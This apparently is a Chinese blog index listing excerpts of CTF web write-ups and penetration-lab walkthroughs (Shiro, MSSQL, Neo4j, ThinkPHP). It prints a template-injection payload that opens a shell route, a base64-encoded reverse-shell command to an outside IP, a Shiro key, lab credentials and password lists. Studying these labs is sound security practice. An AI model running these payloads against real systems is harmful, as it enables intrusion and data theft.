2024 巅峰极客初赛 web 部分wp
2024 巅峰极客初赛 web
感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见
EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了
GoldenHornKing贴一下payload
1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()})
源代码如下
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...
beetl 模板注入学习
beetl 模板注入学习依赖测试使用的依赖
12345678910<dependency> <groupId>com.ibeetl</groupId> <artifactId>beetl</artifactId> <version>3.0.11.RELEASE</version></dependency><dependency> <groupId>org.antlr</groupId> <artifactId>antlr4-runtime</artifactId> <version>4.7.2</version>//需要的引擎</dependency>
语法
主要还是参考官方文档
Beetl: Beetl3.0,模板引擎。从2010年开始研发开源 (gitee.com)
注意到这个
任意方法调用写一个demo看看是怎么阻止恶意方法调用的
12345678 ...
Prain清雨博客v1.3.0审计
Prain清雨博客v1.3.0审计
某比赛里面出现的一道题目
赛时都花时间在做渗透上面了 今天抽出点时间来看看
路由
这个是一个极度轻量化的博客框架 所有的路由控制都在index.php这一个文件里面
首先调用他定义的get方法
这里我们访问的是/目录 为空 默认为index
使用$_SERVER[‘REQUEST_URI’]获取访问的路由
一系列的匹配之后 返回了XDEBUG_SESSION_START=18778这个值
后面就是一系列包含文件 检验安装的操作
然后进到switch里面 查询是否有匹配的路由 存在则反感会页面 否则返还404
比如index 访问/?index
这里显然不存在这个文件 返回空
后台插件rce漏洞该漏洞需要登录 漏洞点出现在?import路由
这个是一个上传主题的地方 这个博客允许上传自定义主题
123456789101112131415if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 's ...
2024 n00bzctf web wp
2024 n00bzctf web wp
最近回到家里 煞笔浙江40多度 不想出门
看了好几天春秋杯的那个mycms 没啥思路 想摆了(划掉)
逛网站 在CTF赛事中心 - Bugku CTF 发现了这个比赛 上来玩玩
题目不是很难 一个小时就ak了。。。水点博客
Passwordless代码
1234567891011121314151617181920212223242526272829303132#!/usr/bin/env python3from flask import Flask, request, redirect, render_template, render_template_stringimport subprocessimport urllibimport uuidglobal leetapp = Flask(__name__)flag = open('/flag.txt').read()leet=uuid.UUID('13371337-1337-1337-1337-133713371337')@app.rou ...
从ciscn2024 sanic和DASCTF2024 Sanic's revenge 学sanic原型链污染
从ciscn2024 sanic和DASCTF2024 Sanic’s revenge 学sanic原型链污染
四川回来 给机房带来了久违的流感
ciscn2024 sanic访问/src给出源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=[&# ...
2024 ciscn 决赛 记录+部分wp
2024 ciscn 决赛 记录+部分wp
第一次国赛决赛 还是很激动的一次比赛
感谢A1natas的小伙伴给予我的帮助 最后混了一个二等奖
day0从杭州萧山飞到成都
四川话听起来还是巴适 这里我就不得不吐槽某一个队员的方言了
比赛举办在四川大学 酒吧舞就是不一样啊 学校看起来就是牛逼
场地在体育馆(怎么又是体育馆 想起来某一次比赛的经历了 说的就是华东南) 开了空调 这空调嘎嘎得劲 回去就吹感冒了
成都是真的不夜城 晚上11点了还是灯火通明
晚上吃了顿火锅(都来四川了不试试?)我草好辣(已老实求放过)
晚上才看到要配置相关可信计算的环境(主办方现在才发 也是厉害的)环境配置到凌晨两点多 第二天起来感觉要寄了
day1第一天是可信计算+awdp 做了点web 然后看边上的大哥对着计算无能狂怒
awdp 绝对是防守修复放在第一位的 防守check过了之后 每一次都可以继续得分
ezjs
fix不许上传ejs文件 但是应该是可以存在rce的
直接加上一个对ejs文件的文件内部文件过滤 随便过滤点就成功修了
break攻击的话 有很多的思路
赛后发现可以是往 n ...
春秋云镜-ThermalPower
春秋云镜-ThermalPower外网使用nmap扫描所给的web服务
访问8080
使用dirsearch扫描泄露文件
确定是heapdump泄露 下载泄露文件
分析得到shirokey
1algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
shiro attack一把梭
得到flag1
弹shell出来 搭建代理
走代理的扫描有点问题 还是上传之后扫描
172.22.17.6:21存在一个ftp服务 可以匿名登录
1proxychains ftp 172.22.17.6
连接很不稳定 直接使用浏览器访问
在SCADA 得到一个用户密码
123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3
fscan扫描 查看
注意到有一个内部员工通讯录和一个火创能源内部通知
注意到初始账号密码格式 scada工程师只有这些
也就是这些密码
12345678910chenhua/chenhua@0813zh ...
春秋云镜-Tsclient
感觉已经国赛已经寄了 四川旅游计划 启动
春秋云镜-Tsclient外网先扫描端口
尝试爆破mssql的账号密码
得到密码为1qaz!QAZ 成功登录mssql
激活xpcmdshell 成功执行命令
msf生成shell 反弹到自己的vps上面来
使用msf自动提权
得到第一个flag
搭建隧道 把流量传出来
扫描内网
1234567891011121314151617181920212223[*] 172.22.8.31 XIAORANG\WIN19-CLIENT [*] 172.22.8.15 [+]DC XIAORANG\DC01 [*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows ServerNetInfo:[*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b ...
春秋云镜-Time
春秋云镜-Time外网
nmap扫描端口 只扫描出来22端口 令我很是疑惑
用goby进行信息收集
注意到开启了7474端口 直接访问
存在Neo4j shell 漏洞 CVE-2021-34371 脚本一把梭
1java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.98.127.126:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI5LjIwMi4xNjQvMzIzMiAwPiYx}|{base64,-d}|{bash,-i}"
成功反弹shell
在tmp目录下上传fscan
查看当前网段
12当前内网IP 172.22.6.36./fscan -h 177.22.6.36/16 >> out.txt
找到以下主机
123[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2 ...
春秋云镜-Initial
我顶!
春秋云镜-Initial外网开始的时候给了一个ip 直接扫描端口
80端口 上去看看
注意到是title 明显是thinkphp
工具跑一下 发现存在ThinkPHP 5.0.23 RCE
一键getshell之后 蚁剑连接
上传linux-exploit-suggester 到tmp目录下 提权
可以看到sudo 提权
sudo -l 查看
mysql存在sudo权限
注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权
得到flag1
1flag{60b53231-
查看内网ip
上传 fscan 扫描内网
搭建代理 传递流量出来
172.22.1.18
弱密码admin/admin123 登录
网上翻找有没有payload
12345678910111213141516171819202122232425262728293031323334import requestssession = requests.session()url_pre = 'http://172.22 ...